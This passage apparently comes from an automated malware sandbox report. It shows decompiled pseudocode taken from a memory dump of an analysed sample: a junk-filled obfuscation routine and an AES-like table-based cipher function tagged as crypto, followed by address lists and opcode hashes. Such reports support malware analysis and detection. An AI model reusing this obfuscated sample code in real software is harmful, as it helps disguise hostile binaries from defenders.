				_t104 =  *0x2be5a709 ^  *0xc3b40dd9;
				_push(_t87);
				_t72 = _t72 + 0x00000001 ^ 0x00000032;
				_t87 =  *0x4a2e0bb;
				if(_t72 < 0) {
					_t87 = _t87 & 0xad2f0c79;
					 *0xb22aac33 =  *0xb22aac33 & _t64;
					asm("sbb [0xf3b49627], eax");
					_t93 = _t93 -  *0x750853c5;
					 *0x5ca43be =  *0x5ca43be & _t64;
					 *0x480dbdc0 = _t104;
					 *0xd2280d9c = _t72;
					asm("sbb dh, [0xb75a4fd7]");
					 *0x190698bf =  *0x190698bf >> 0xc;
					_t64 = _t64 + 1;
					_t72 =  *0xd2280d9c | 0x00000012;
					if(_t72 < 0) {
						asm("ror dword [0x2f5b1379], 0x40");
						asm("rcr byte [0x94b47604], 0x26");
						 *0x6fc802f8 =  *0x88239d69 * 0xccc2;
						asm("movsw");
						 *0x7d10d93c =  *0x7d10d93c & _t64;
						_t64 =  *0xaf35b028 &  *0x28e3611f;
						_pop(_t104);
						_t87 = _t87 -  *0xad561726;
						asm("ror dword [0x79c109d9], 0x97");
						 *0x80c7ee0e =  *0x80c7ee0e ^ _t64;
						asm("sbb [0x5d99a0c], al");
						 *0x669d42b4 = _t57;
						 *0xf0700a9c =  *0xf0700a9c >> 0x57;
						_t93 = _t93 |  *0xd95c87ff;
						 *0x4819e00a =  *0x4819e00a ^ _t64;
						_pop(_t57);
						asm("ror byte [0x8bdcc520], 0x41");
						_pop(_t96);
						_t77 =  *0x6fc802f8 ^  *0xd0b60fd9;
						asm("adc esp, [0xcfabdd37]");
						 *0x6760a6e4 =  *0x6760a6e4 |  *0x6fc802f8 ^  *0xd0b60fd9;
						if( *0x6760a6e4 < 0) {
							_push(0x547a129f);
							_t72 = _t72 | 0xffffffffffff6dfb;
							asm("sbb dl, 0x30");
							_t97 = _t96 |  *0xd73d462;
							_t57 = _t57 - 0x8a;
							if(_t57 >= 0) {
								_t72 =  *0xa3021e7c * 0xf9e3;
								_pop( *0x37b7f02b);
								asm("stosb");
								if(_t72 >= 0) {
									 *0xf0872570 =  *0xf0872570 | _t57;
									_t93 = _t93 + 1;
									_pop(_t77);
									_t64 =  *0x3d8b246e;
									 *0x2f44aec9 =  *0x2f44aec9 + _t77;
									_pop(_t104);
									asm("adc esp, [0xaa209899]");
									_t57 = _t57 + 0x00000001 & 0x0000002a;
									_t99 = (_t97 &  *0x77920b2d) + 1;
									_t87 =  *0xe56d1d31;
									L1();
									 *0x2926e8 =  *0x2926e8 >> 0xbb;
									_t72 = _t72 ^ 0x00000010;
									if(_t72 <= 0) {
										asm("adc edi, [0x76e59d13]");
										 *0xea911414 =  *0xea911414 + _t64;
										asm("rol dword [0xd90140fb], 0xdc");
										_t72 = _t72 + 1;
										asm("ror dword [0x88f06ed4], 0x93");
										asm("rcl dword [0xfcbc9b0b], 0xf1");
										asm("sbb ebx, [0x58670a3f]");
										 *0xc752a2ca =  *0xc752a2ca >> 0x7a;
										asm("adc ebx, 0x52382e8c");
										 *0x12fec0e1 =  *0x12fec0e1 ^ _t72;
										 *0xc73ea98 =  *0xc73ea98 | _t99;
										asm("sbb ebx, 0xa60d8edb");
										 *0xcca59d37 =  *0xcca59d37 ^ 0x847f4b97;
										asm("adc [0xc0649fba], eax");
										asm("adc [0xb6665193], eax");
										asm("lodsd");
										_t100 = _t99;
										 *0x3a10c86 =  *0x3a10c86 >> 8;
										_t104 =  *0x76e3a19a;
										 *0x76e3a19a =  *0x9c65557f * 0x68f5 - 1;
										 *0xbb0d2d3b =  *0xbb0d2d3b - _t100;
										asm("adc eax, [0xe57cabfd]");
										 *0x935ceec =  *0x935ceec - 0x847f4b97;
										asm("rol byte [0x4c492f32], 0x15");
										_push( *0x5dc8a407);
										_t93 =  *0x9065636b * 0x49be;
										asm("lodsd");
										_pop(_t85);
										_t64 = (0x000000e5 &  *0xae6ba087 ^  *0x4b0b741b) + 0x6b06fff5 ^ 0x7637760e;
										_t87 = 0x847f4b97 -  *0xecc757b9;
										 *0x7fcd3ef3 = _t72;
										_t77 =  *0xe6c0dfb;
										 *0xe6c0dfb = _t85;
										asm("rcl dword [0x428943f5], 0xad");
										asm("sbb ecx, [0x4f472f06]");
										asm("adc [0x793fa80d], edi");
										_t101 = _t100 -  *0x27126cf5;
										 *0x5fac7520 =  *0x5fac7520 << 0x6a;
										_t57 = 0x3ff632a0;
										if(0x3ff632c1 < 0) {
											_t77 = _t77 | 0x7ba6d579;
											_t93 =  *0xee40c56a * 0xe394;
											 *0x64bf12f9 =  *0x64bf12f9 & 0x3ff632a0;
											if( *0x64bf12f9 == 0) {
												asm("adc ebp, [0x78e7f075]");
												asm("lodsb");
												_push(_t72);
												asm("rcl dword [0xf4750365], 0xd5");
												 *0x9ff0e1e0 =  *0x9ff0e1e0 - _t77;
												 *0xdc0df9e2 =  *0xdc0df9e2 + _t72;
												 *0x84291b9f = _t101;
												 *0x82498499 =  *0x82498499 >> 0x7d;
												if( *0xdc0df9e2 < 0) {
													_t62 =  *0x10792f7d * 0xab04;
													_push(_t62);
													asm("sbb [0xe834e8ed], edi");
													_t57 = _t62 +  *0x272619dd | 0x77b8e9f7;
													_push( *0x376bdb9f);
													asm("sbb [0xdf1afd9c], esi");
													asm("sbb edx, [0xf9ba5dcb]");
													_t64 = (_t64 |  *0xc32612f7) - 1;
													asm("rcr dword [0x23c63edb], 0x7b");
													_t104 = _t104 -  *0x410cbdcf - 1;
													asm("sbb ch, 0x38");
													_t87 = _t87 &  *0x68386d17;
													L1();
													_t72 = _t72 +  *0x35f227b5 -  *0xf577c833;
													_t77 =  *0xba58908e;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}


















                                      0x0041d504
                                      0x0041d509
                                      0x0041d50e
                                      0x0041d50f
                                      0x0041d511
                                      0x0041d517
                                      0x0041d51c
                                      0x0041d521
                                      0x0041d527
                                      0x0041d533
                                      0x0041d539
                                      0x0041d53f
                                      0x0041d546
                                      0x0041d549
                                      0x0041d54f
                                      0x0041d550
                                      0x0041d556
                                      0x0041d55d
                                      0x0041d55d
                                      0x0041d55e
                                      0x0041d564
                                      0x0041d56e
                                      0x0041d56f
                                      0x0041d575
                                      0x0041d57b
                                      0x0041d582
                                      0x0041d588
                                      0x0041d58e
                                      0x0041d593
                                      0x0041d596
                                      0x0041d59c
                                      0x0041d5a6
                                      0x0041d5ac
                                      0x0041d5b2
                                      0x0041d5b3
                                      0x0041d5b8
                                      0x0041d5b8
                                      0x0041d5b8
                                      0x0041d5be
                                      0x0041d5c4
                                      0x0041d5cb
                                      0x0041d5cd
                                      0x0041d5d3
                                      0x0041d5da
                                      0x0041d5e0
                                      0x0041d5e1
                                      0x0041d5e7
                                      0x0041d5e8
                                      0x0041d5e9
                                      0x0041d5f0
                                      0x0041d5f1
                                      0x0041d5f7
                                      0x0041d5fd
                                      0x0041d603
                                      0x0041d60a
                                      0x0041d610
                                      0x0041d612
                                      0x0041d618
                                      0x0041d61e
                                      0x0041d624
                                      0x0041d626
                                      0x0041d627
                                      0x0041d62a
                                      0x0041d630
                                      0x0041d636
                                      0x0041d637
                                      0x0041d63e
                                      0x0041d63f
                                      0x0041d645
                                      0x0041d645
                                      0x0041d646
                                      0x0041d64b
                                      0x0041d651
                                      0x0041d658
                                      0x0041d65a
                                      0x0041d65b
                                      0x0041d665
                                      0x0041d66b
                                      0x0041d671
                                      0x0041d672
                                      0x0041d672
                                      0x0041d678
                                      0x0041d679
                                      0x0041d67f
                                      0x0041d685
                                      0x0041d685
                                      0x0041d68b
                                      0x0041d691
                                      0x0041d697
                                      0x0041d6a3
                                      0x0041d6a9
                                      0x0041d6af
                                      0x0041d6b6
                                      0x0041d6b7
                                      0x0041d6b7
                                      0x0041d6bd
                                      0x0041d6c3
                                      0x0041d6c3
                                      0x0041d6c3
                                      0x0041d6c9
                                      0x0041d6d0
                                      0x0041d6d6
                                      0x0041d6dc
                                      0x0041d6e2
                                      0x0041d6e8
                                      0x0041d6ee
                                      0x0041d6f4
                                      0x0041d6f5
                                      0x0041d6f6
                                      0x0041d6fc
                                      0x0041d702
                                      0x0041d708
                                      0x0041d70e
                                      0x0041d714
                                      0x0041d71a
                                      0x0041d721
                                      0x0041d727
                                      0x0041d728
                                      0x0041d72f
                                      0x0041d735
                                      0x0041d738
                                      0x0041d73e
                                      0x0041d744
                                      0x0041d74a
                                      0x0041d750
                                      0x0041d756
                                      0x0041d75c
                                      0x0041d763
                                      0x0041d764
                                      0x0041d765
                                      0x0041d76b
                                      0x0041d771
                                      0x0041d777
                                      0x0041d77d
                                      0x0041d784
                                      0x0041d785
                                      0x0041d78b
                                      0x0041d791
                                      0x0041d797
                                      0x0041d79d
                                      0x0041d7a3
                                      0x0041d7a9
                                      0x0041d7a9
                                      0x0041d7b0
                                      0x0041d7b5
                                      0x0041d7bb
                                      0x0041d7c1
                                      0x0041d7c7
                                      0x0041d7ce
                                      0x0041d7d5
                                      0x0041d7d5
                                      0x0041d7db
                                      0x0041d7dc
                                      0x0041d7dd
                                      0x0041d7e3
                                      0x0041d7e9
                                      0x0041d7ea
                                      0x0041d7ef
                                      0x0041d7f5
                                      0x0041d7f5
                                      0x0041d7fc
                                      0x0041d802
                                      0x0041d808
                                      0x0041d80e
                                      0x0041d815
                                      0x0041d81b
                                      0x0041d822
                                      0x0041d828
                                      0x0041d82e
                                      0x0041d834
                                      0x0041d835
                                      0x0041d83b
                                      0x0041d841
                                      0x0041d847
                                      0x0041d84d
                                      0x0041d84d
                                      0x0041d853
                                      0x0041d854
                                      0x0041d85a
                                      0x0041d860
                                      0x0041d866
                                      0x0041d86c
                                      0x0041d86d
                                      0x0041d86d
                                      0x0041d86d
                                      0x0041d873
                                      0x0041d874
                                      0x0041d877
                                      0x0041d878
                                      0x0041d87b
                                      0x0041d881
                                      0x0041d887
                                      0x0041d88d
                                      0x0041d88e
                                      0x0041d894
                                      0x0041d89a
                                      0x0041d8a0
                                      0x0041d8a6
                                      0x0041d8ac
                                      0x0041d8b2
                                      0x0041d8b8
                                      0x0041d8bf
                                      0x0041d8c6
                                      0x0041d8cd
                                      0x0041d8d4
                                      0x0041d8da
                                      0x0041d8e1
                                      0x0041d8e7
                                      0x0041d8ed
                                      0x0041d8f3
                                      0x0041d8f5
                                      0x0041d8f5
                                      0x0041d8f5
                                      0x0041d8fb
                                      0x0041d901
                                      0x0041d907
                                      0x0041d90d
                                      0x0041d913
                                      0x0041d919
                                      0x0041d91b
                                      0x0041d921
                                      0x0041d927
                                      0x0041d92e
                                      0x0041d92e
                                      0x0041d934
                                      0x0041d93a
                                      0x0041d940
                                      0x0041d946
                                      0x0041d94c
                                      0x0041d953
                                      0x0041d959
                                      0x0041d95f
                                      0x0041d961
                                      0x0041d968
                                      0x0041d96e
                                      0x0041d974
                                      0x0041d97a
                                      0x0041d97a
                                      0x0041d981
                                      0x0041d987
                                      0x0041d991
                                      0x0041d992
                                      0x0041d992
                                      0x0041d993
                                      0x0041d999
                                      0x0041d99f
                                      0x0041d9a0
                                      0x0041d9a6
                                      0x0041d9b0
                                      0x0041d9b5
                                      0x0041d9b5
                                      0x0041d9bb
                                      0x0041d9c1
                                      0x0041d9cb
                                      0x0041d9cc
                                      0x0041d9d2
                                      0x0041d9d8
                                      0x0041d9df
                                      0x0041d9e8
                                      0x0041d9ee
                                      0x0041d9ee
                                      0x0041d9ee
                                      0x0041d9f4
                                      0x0041d9fa
                                      0x0041d9fb
                                      0x0041da01
                                      0x0041da02
                                      0x0041da08
                                      0x0041da0e
                                      0x0041da14
                                      0x0041da1a
                                      0x0041da1c
                                      0x0041da23
                                      0x0041da26
                                      0x0041da2c
                                      0x0041da33
                                      0x0041da39
                                      0x0041da3a
                                      0x0041da40
                                      0x0041da41
                                      0x0041da47
                                      0x0041da47
                                      0x0041da47
                                      0x0041da4d
                                      0x0041da54
                                      0x0041da5a
                                      0x0041da60
                                      0x0041da66
                                      0x0041da6c
                                      0x0041da6d
                                      0x0041da73
                                      0x0041da79
                                      0x0041da7a
                                      0x0041da80
                                      0x0041da81
                                      0x0041da87
                                      0x0041da93
                                      0x0041da93
                                      0x0041da99
                                      0x0041da9f
                                      0x0041daa6
                                      0x0041daab
                                      0x0041daae
                                      0x0041daaf
                                      0x0041dab5
                                      0x0041dabb
                                      0x0041dac2
                                      0x0041dac9
                                      0x0041dacf
                                      0x0041dad5
                                      0x0041dad6
                                      0x0041dad7
                                      0x0041dadd
                                      0x0041dae3
                                      0x0041dae9
                                      0x0041daef
                                      0x0041daf2
                                      0x0041daf8
                                      0x0041dafe
                                      0x0041daff
                                      0x0041db06
                                      0x0041db0c
                                      0x0041db12
                                      0x0041db1c
                                      0x0041db1c
                                      0x0041db1d
                                      0x0041db23
                                      0x0041db29
                                      0x0041db30
                                      0x0041db36
                                      0x0041db3c
                                      0x0041db3c
                                      0x0041db1d
                                      0x0041da99
                                      0x0041d9bb
                                      0x0041d9a0
                                      0x0041d993
                                      0x0041d981
                                      0x0041d934
                                      0x0041d8a6
                                      0x0041d854
                                      0x0041d7fc
                                      0x0041d7dd
                                      0x0041d7b5
                                      0x0041d68b
                                      0x0041d679
                                      0x0041d64b
                                      0x0041d55e
                                      0x0041d176
                                      0x0041d176
                                      0x0041d183
                                      0x0041d189
                                      0x0041d190
                                      0x0041d193
                                      0x0041d199
                                      0x0041d19b
                                      0x0041d1a1
                                      0x0041d1a7
                                      0x0041d1ad
                                      0x0041d1b9
                                      0x0041d1bf
                                      0x0041d1c5
                                      0x0041d1cb
                                      0x0041d1d1
                                      0x0041d1d8
                                      0x0041d1d9
                                      0x0041d1dc
                                      0x0041d1de
                                      0x0041d1ef
                                      0x0041d1f6
                                      0x0041d1fc
                                      0x0041d1fe
                                      0x0041d210
                                      0x0041d216
                                      0x0041d223
                                      0x0041d229
                                      0x0041d230
                                      0x0041d236
                                      0x0041d23c
                                      0x0041d241
                                      0x0041d24e
                                      0x0041d254
                                      0x0041d25a
                                      0x0041d25b
                                      0x0041d262
                                      0x0041d263
                                      0x0041d269
                                      0x0041d26f
                                      0x0041d275
                                      0x0041d281
                                      0x0041d286
                                      0x0041d28c
                                      0x0041d28f
                                      0x0041d295
                                      0x0041d298
                                      0x0041d29e
                                      0x0041d2a8
                                      0x0041d2ae
                                      0x0041d2af
                                      0x0041d2b5
                                      0x0041d2bb
                                      0x0041d2c2
                                      0x0041d2c3
                                      0x0041d2c9
                                      0x0041d2cf
                                      0x0041d2d6
                                      0x0041d2e3
                                      0x0041d2e6
                                      0x0041d2e7
                                      0x0041d2ed
                                      0x0041d2f2
                                      0x0041d2f9
                                      0x0041d2fc
                                      0x0041d313
                                      0x0041d319
                                      0x0041d330
                                      0x0041d337
                                      0x0041d338
                                      0x0041d33f
                                      0x0041d347
                                      0x0041d34d
                                      0x0041d35a
                                      0x0041d362
                                      0x0041d36d
                                      0x0041d373
                                      0x0041d379
                                      0x0041d37f
                                      0x0041d386
                                      0x0041d38c
                                      0x0041d393
                                      0x0041d3a0
                                      0x0041d3a8
                                      0x0041d3a8
                                      0x0041d3ae
                                      0x0041d3b4
                                      0x0041d3c0
                                      0x0041d3c6
                                      0x0041d3cd
                                      0x0041d3ec
                                      0x0041d3f6
                                      0x0041d3f7
                                      0x0041d3f8
                                      0x0041d3fe
                                      0x0041d404
                                      0x0041d40a
                                      0x0041d40a
                                      0x0041d410
                                      0x0041d417
                                      0x0041d41d
                                      0x0041d423
                                      0x0041d429
                                      0x0041d432
                                      0x0041d433
                                      0x0041d439
                                      0x0041d43f
                                      0x0041d449
                                      0x0041d44f
                                      0x0041d455
                                      0x0041d45b
                                      0x0041d45c
                                      0x0041d45d
                                      0x0041d464
                                      0x0041d46a
                                      0x0041d471
                                      0x0041d477
                                      0x0041d47e
                                      0x0041d484
                                      0x0041d494
                                      0x0041d49b
                                      0x0041d4a7
                                      0x0041d4ac
                                      0x0041d4b2
                                      0x0041d4b8
                                      0x0041d4be
                                      0x0041d4c5
                                      0x0041d4d2
                                      0x0041d4d3
                                      0x0041d4d6
                                      0x0041d4dc
                                      0x0041d4ed
                                      0x0041d4f3
                                      0x0041d4f3
                                      0x0041d47e
                                      0x0041d44f
                                      0x0041d433
                                      0x0041d2fc
                                      0x0041d2af
                                      0x0041d298
                                      0x0041d275
                                      0x0041d1dc
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4349efa6ea8d161fb0feef0707f080a343da39ade4774a1372dd5758807d595e
                                      • Instruction ID: 3f21df822ca63585bd1b96027f60e817bf6500b914905a46d00b9662f22fcc58
                                      • Opcode Fuzzy Hash: 4349efa6ea8d161fb0feef0707f080a343da39ade4774a1372dd5758807d595e
                                      • Instruction Fuzzy Hash: 4532BA72918381DFD706CF38D98A7813FF1F716724B18824EC5A2875A2D778256ACF89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402FB0, Relevance: .4, Instructions: 435COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 26%
                                      			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
				asm("ror ebx, 0x8");
				asm("ror edi, 0x10");
				asm("rol edi, 0x8");
				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
				asm("ror edi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
				_t409 =  &(__ecx[8]);
				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
				_t478 = (_a4 >> 1) - 1;
				_a4 = _t478;
				if(_t478 != 0) {
					do {
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
						asm("ror edi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
						asm("ror ebx, 0x8");
						asm("ror edi, 0x10");
						asm("rol edi, 0x8");
						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
						asm("ror edi, 0x10");
						asm("ror edx, 0x8");
						asm("rol edx, 0x8");
						_v24 = _t383;
						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
						asm("ror edx, 0x10");
						asm("ror esi, 0x8");
						asm("rol esi, 0x8");
						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
						asm("ror esi, 0x10");
						asm("ror ebx, 0x8");
						asm("rol ebx, 0x8");
						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
						_v12 = _t560;
						asm("ror edi, 0x8");
						asm("ror ebx, 0x10");
						asm("rol ebx, 0x8");
						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
						asm("ror ebx, 0x10");
						asm("ror edi, 0x8");
						asm("rol edi, 0x8");
						_t409 =  &(_t409[8]);
						_t205 =  &_a4;
						 *_t205 = _a4 - 1;
						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
					} while ( *_t205 != 0);
				}
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                      0x00402fb0
                                      0x00402fbf
                                      0x00402fc8
                                      0x00402fd6
                                      0x00402fda
                                      0x00402fe3
                                      0x00402ff4
                                      0x00402ff7
                                      0x00402ffc
                                      0x00403005
                                      0x00403013
                                      0x00403018
                                      0x00403021
                                      0x00403031
                                      0x00403051
                                      0x00403054
                                      0x00403066
                                      0x0040306b
                                      0x00403080
                                      0x0040309d
                                      0x004030a0
                                      0x004030b1
                                      0x004030c6
                                      0x004030e6
                                      0x004030e9
                                      0x004030fb
                                      0x00403119
                                      0x00403136
                                      0x00403139
                                      0x0040314b
                                      0x00403160
                                      0x00403166
                                      0x0040316e
                                      0x0040316f
                                      0x00403172
                                      0x00403180
                                      0x00403190
                                      0x004031a2
                                      0x004031b4
                                      0x004031d0
                                      0x004031e3
                                      0x004031f0
                                      0x00403201
                                      0x00403218
                                      0x0040323a
                                      0x0040323d
                                      0x0040324e
                                      0x00403269
                                      0x00403280
                                      0x00403283
                                      0x00403295
                                      0x0040329d
                                      0x004032b2
                                      0x004032cf
                                      0x004032d2
                                      0x004032e3
                                      0x00403307
                                      0x00403317
                                      0x0040331a
                                      0x0040332c
                                      0x00403344
                                      0x00403347
                                      0x0040335a
                                      0x00403367
                                      0x00403379
                                      0x00403391
                                      0x004033b4
                                      0x004033b7
                                      0x004033c9
                                      0x004033de
                                      0x004033e4
                                      0x004033e4
                                      0x004033e7
                                      0x004033e7
                                      0x00403180
                                      0x0040344b
                                      0x00403454
                                      0x00403462
                                      0x004034c0
                                      0x004034c9
                                      0x004034d7
                                      0x00403539
                                      0x00403542
                                      0x0040354f
                                      0x00403552
                                      0x0040359e
                                      0x004035aa
                                      0x004035b3
                                      0x004035c0
                                      0x004035c7

                                      Memory Dump Source
                                      • Source File: 00000003.00000002.313036443.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                      • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                      • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
